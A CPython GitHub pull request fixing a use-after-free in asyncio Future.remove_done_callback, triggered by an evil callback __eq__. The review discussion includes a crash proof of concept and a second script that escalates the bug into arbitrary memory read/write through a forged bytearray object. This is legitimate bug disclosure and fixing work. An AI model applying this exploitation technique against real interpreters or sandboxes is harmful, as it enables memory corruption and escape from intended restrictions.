Skip to content

gh-125966: fix UAF on fut->fut_callback0 due to an evil callback's __eq__ #125967

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 8 commits into from
Oct 27, 2024

Conversation

picnixz
Copy link
Member

@picnixz picnixz commented Oct 25, 2024

@kumaraditya303
Copy link
Contributor

The pure python implementation cannot crash the interpreter, so -1 on changing that, let's keep the original behaviour.

Comment on lines +1024 to +1026
PyObject *fut_callback0 = Py_NewRef(self->fut_callback0);
int cmp = PyObject_RichCompareBool(fut_callback0, fn, Py_EQ);
Py_DECREF(fut_callback0);
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hmm, could you explain the issue more to me? I don't see any need to explicitly hold a reference here, because we (should) implicitly hold one by holding a reference to self.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If you run the PoC:

import asyncio

fut = asyncio.Future()

class a:
    def __eq__(self, other):
        print("in a __eq__", self)
		print("other is", other)
        return True
    
    def __del__(self):
        print("deleting", self)

class b(a):
    def __eq__(self, other):
        print("in b __eq__")
        fut.remove_done_callback(None)
		print("None was removed")
        return NotImplemented

fut.add_done_callback(a())
fut.remove_done_callback(b())

you would get:

in b __eq__
in a __eq__ <__main__.a object at 0x7f2ef037f4a0>
other is None
None was removed
deleting <__main__.a object at 0x7f2ef037f4a0>
Segmentation fault (core dumped)

If you don't hold a reference to fut_callback0, the issue is that after __eq__, the reference to fut_callback0 will be freed before completing the call because of

if (cmp == 1) {
    /* callback0 == fn */
    Py_CLEAR(self->fut_callback0);  // this clears 
    Py_CLEAR(self->fut_context0);
    cleared_callback0 = 1; 
}

@Nico-Posada Please correct me if I'm wrong here!

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yeah that's main idea. After running fut.remove_done_callback(None) self->fut_callback0 will be cleared, but then the evil function returns NotImplemented which causes PyObject_RichCompareBool to call fut_callback0's __eq__ func after fut_callback0 has been cleared.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

fwiw, here's a POC that shows how you can escalate this to malicious object creation (tested on v3.13.0 on ubuntu 24.04 x86_64)

import asyncio

fut = asyncio.Future()

class a(bytes):
    def __eq__(self, other):
        print("in a __eq__", hex(id(self)), hex(id(other)))
        return True
    
    def __del__(self):
        print("deleting", hex(id(self)))

class b(a):
    def __eq__(self, other):
        global pad
        print("in b __eq__", hex(id(self)), hex(id(other)))
        fut.remove_done_callback(None)
        del pad, other
        print("created ", hex(id(prealloc + fake_obj)))
        return NotImplemented

class Catch:
    __slots__ = ("mem",)
    def __eq__(self, other):
        global mem
        mem = self.mem
        return True

fake_ba = (
    (0x123456).to_bytes(8, 'little') +
    id(bytearray).to_bytes(8, 'little') +
    (2**63 - 1).to_bytes(8, 'little') +
    (0).to_bytes(24, 'little')
)

fake_obj = (
    (0x123456).to_bytes(8, 'little') +
    id(Catch).to_bytes(8, 'little') +
    (id(fake_ba) + bytes.__basicsize__ - 1).to_bytes(8, 'little')
)

prealloc = a(0x8050)
pad = a(0x8000)
to_corrupt = a(0x8000)
print("pad:", hex(id(pad)), "to_corrupt:", hex(id(to_corrupt)))
print("diff:", hex(id(to_corrupt) - id(pad)))

mem = None

# transfer ownership to fut
fut.add_done_callback(to_corrupt)
del to_corrupt

fut.remove_done_callback(b())

if mem is None:
    print("failed")
    exit()

print(hex(len(mem))) # => 0x7fffffffffffffff
mem[id(250) + int.__basicsize__] = 100
print(250) # => 100

@asvetlov
Copy link
Contributor

What if we just forbid recursive callback removal at all?
Or even more, forbid calling add_done_callback() and remove_done_callback() from remove_done_callback() call?
I don't think that this change will break any existing and working code. Even if some subtle backward compatibility issue will be caught it could be fixed relatively easy by authors.

For example, if a dict is changed during iteration python raises RuntimeError because there is no clear and obvious behavior for this situation.

I have a feeling that recursive callbacks list modification falls in the same trap. What a user expects if __eq__ adds and removes the same callback multiple times? What should be in the final list?

Explicit forbidding such edge cases makes the logic clearer for human understanding. Potential crash is converted into RuntimeError.

What are your opinions?

@kumaraditya303
Copy link
Contributor

What if we just forbid recursive callback removal at all?

I imagine that would make the code even more complex, extra checks would have to be added to guard and check size after each iteration, a simpler change is to just incref the callback as done here, this pattern is very common in codebase to avoid crashes. As for the behavior, I'd let it be how it is, if user messes things up it's their fault, nobody in their right mind should do something like this so I am only concerned about not crashing the interp.

@asvetlov
Copy link
Contributor

asvetlov commented Oct 25, 2024

The check could be as simple as adding a bool flag to a future instance, checking it at the very beginning of remove_done_callback, and switching it on if not set.

I don't insist though. Messy behavior can live on its own if it doesn't crash Python, agree.

Should we care about the following scenario? Assume we are working with CFuture.

  1. Initial callbacks list is [a, b, c]. fut_callback0 is a and fut_callbacks is [b, c] (I'll skip callback contexts for clarity).
  2. fut.remove_done_callback(a) is called.
  3. __eq__ recursively calls fut.remove_done_callback(a) and returns True. Now fut_callback0 is b and fut_callbacks is [c].
  4. PyObject_RichCompareBool call returns 1, fut_callback0 should be deleted. It contains b now.
  5. As the result, the final callbacks list is [c] instead of expected [b, c].

To fix this, we should check fut_callback0 in a loop until PyObject_RichCompareBool(...) changes this field.

@picnixz picnixz changed the title gh-125966: fix UAF on fut->fut_callback0 in _asynciomodule.c gh-125966: fix UAF on fut->fut_callback0 due to an evil callback's __eq__ Oct 26, 2024
@picnixz
Copy link
Member Author

picnixz commented Oct 26, 2024

What if we just forbid recursive callback removal at all?

While I find it good on paper, I think we shouldn't make the module more complicate than what it is already. While I doubt someone has a good reason to mutate the list, IIRC, most of the UAFs were fixed by incrementing refcounts in general, and not by forbidding some kind of "bad" operation.

I'm also wondering but how does it work if multiple threads access the future's state? isn't possible to fool the check (we may require locks for prevent this)? (or, more generally, would this approach work in the free-threaded build without additional locks and co?) [I don't know if the current implementation is perfectly fool-proofed in the free-threaded build by the way]

So I'd prefer first fixing the interpreter that way and maybe we could come back with a more intricate solution later if needs arise?

Comment on lines 1015 to 1018
// Beware: An evil PyObject_RichCompareBool could change fut_callback0
// (see https://github.com/python/cpython/issues/125789 for details)
// In addition, the reference to self->fut_callback0 may be cleared,
// so we need to temporarily hold it explicitly.
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This comment feels a bit confusing. I had a hard time figuring where in that issue to look for the example involving callback0. I also had a hard time understanding that returning NotImplemented will cause a second rich comparison to be invoked (by the first one) after the first argument to the first one has been DECREF'ed. (Thanks to the long comments below I now understand this -- good catch all!). Maybe deep-link to a specific comment in the issue? Or maybe just explain that if fn's __eq__ is evil enough, it can cause the first arg to PyObject_RichCompareBool be freed before a recursive PyObject_RichCompareBool calls is made with that same arg.

But now I am thinking that this is really a general weakness in PyObject_RichCompareBool that should be fixed there! (Maybe in do_richcompare.) Thoughts?

Copy link
Member Author

@picnixz picnixz Oct 27, 2024

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Or maybe just explain that if fn's eq is evil enough, it can cause the first arg to PyObject_RichCompareBool be freed before a recursive PyObject_RichCompareBool calls is made with that same arg.

That's a good way to phrase it; I also didn't really know how to say it properly. Alternatively, I think a link to the comment #125967 (comment) would be fine as well. We can also say both so
that readers don't need to open the link if you want (and to give a bit of context as for the other comments)

But now I am thinking that this is really a general weakness in PyObject_RichCompareBool that should be fixed there! (Maybe in do_richcompare.) Thoughts?

Unfortunately, I'm not sure we can always make it work. It would be great if PyObject_RichCompareBool was smart enough to figure it out but there are cases when it would not be straightforward (for instance: #119004 (comment)). Note that the evil __eq__ works in this specific situation because we can mutate the operands being compared to trigger the UAF but that's not always the case I think =/

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

By the way, there are at least two ways of fixing a UAF like this: either you incref/decref eagerly or you transfer ownership. The latter is only done if you'll anyway clear the ref after the call and is cheaper than the former, but in general, we need to do the latter. Since __eq__ is a common operation, we try to be as efficient possible.

Copy link
Contributor

@asvetlov asvetlov left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ok, I can buy the patch because of its simplicity.
Thanks!

Copy link
Contributor

@kumaraditya303 kumaraditya303 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

There are merge conflicts

@bedevere-app
Copy link

bedevere-app bot commented Oct 27, 2024

A Python core developer has requested some changes be made to your pull request before we can consider merging it. If you could please address their requests along with any other requests in other reviews from core developers that would be appreciated.

Once you have made the requested changes, please leave a comment on this pull request containing the phrase I have made the requested changes; please review again. I will then notify any core developers who have left a review that you're ready for them to take another look at this pull request.

@picnixz

This comment was marked as resolved.

@picnixz
Copy link
Member Author

picnixz commented Oct 27, 2024

I have made the requested changes; please review again.

@bedevere-app
Copy link

bedevere-app bot commented Oct 27, 2024

Thanks for making the requested changes!

@kumaraditya303, @asvetlov: please review the changes made to this pull request.

Copy link
Member

@gvanrossum gvanrossum left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Okay, looks good! Is anyone here able to merge? (@kumaraditya303 are you happy with this?) Otherwise I can do it.

@kumaraditya303 kumaraditya303 merged commit ed5059e into python:main Oct 27, 2024
39 of 42 checks passed
@miss-islington-app
Copy link

Thanks @picnixz for the PR, and @kumaraditya303 for merging it 🌮🎉.. I'm working now to backport this PR to: 3.12, 3.13.
🐍🍒⛏🤖

miss-islington pushed a commit to miss-islington/cpython that referenced this pull request Oct 27, 2024
… evil callback's `__eq__` in asyncio (pythonGH-125967)

(cherry picked from commit ed5059e)

Co-authored-by: Bénédikt Tran <[email protected]>
miss-islington pushed a commit to miss-islington/cpython that referenced this pull request Oct 27, 2024
… evil callback's `__eq__` in asyncio (pythonGH-125967)

(cherry picked from commit ed5059e)

Co-authored-by: Bénédikt Tran <[email protected]>
@bedevere-app
Copy link

bedevere-app bot commented Oct 27, 2024

GH-126047 is a backport of this pull request to the 3.13 branch.

@bedevere-app bedevere-app bot removed the needs backport to 3.13 bugs and security fixes label Oct 27, 2024
@bedevere-app
Copy link

bedevere-app bot commented Oct 27, 2024

GH-126048 is a backport of this pull request to the 3.12 branch.

@bedevere-app bedevere-app bot removed the needs backport to 3.12 only security fixes label Oct 27, 2024
@picnixz picnixz deleted the fix/future-callback-uaf-125966 branch October 27, 2024 17:14
kumaraditya303 pushed a commit that referenced this pull request Oct 27, 2024
…n evil callback's `__eq__` in asyncio (GH-125967) (#126048)

gh-125966: fix use-after-free on `fut->fut_callback0` due to an evil callback's `__eq__` in asyncio (GH-125967)
(cherry picked from commit ed5059e)

Co-authored-by: Bénédikt Tran <[email protected]>
kumaraditya303 pushed a commit that referenced this pull request Oct 27, 2024
…n evil callback's `__eq__` in asyncio (GH-125967) (#126047)

gh-125966: fix use-after-free on `fut->fut_callback0` due to an evil callback's `__eq__` in asyncio (GH-125967)
(cherry picked from commit ed5059e)

Co-authored-by: Bénédikt Tran <[email protected]>
picnixz added a commit to picnixz/cpython that referenced this pull request Dec 8, 2024
ebonnal pushed a commit to ebonnal/cpython that referenced this pull request Jan 12, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

7 participants